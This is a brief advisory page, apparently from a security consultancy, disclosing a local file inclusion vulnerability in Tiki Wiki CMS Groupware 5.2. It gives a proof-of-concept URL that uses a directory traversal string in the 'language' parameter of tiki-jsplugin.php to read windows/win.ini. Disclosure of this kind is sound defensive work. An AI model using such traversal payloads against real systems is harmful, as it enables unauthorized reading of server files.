Home
Consulting
Advisories
Software
Articles
Contact

Tiki Wiki CMS Groupware 5.2 Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in Tiki Wiki CMS Groupware 5.2 can be exploited to include arbitrary files.

Proof Of Concept

http://localhost/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini


Copyright © 2018 AutoSec Tools LLC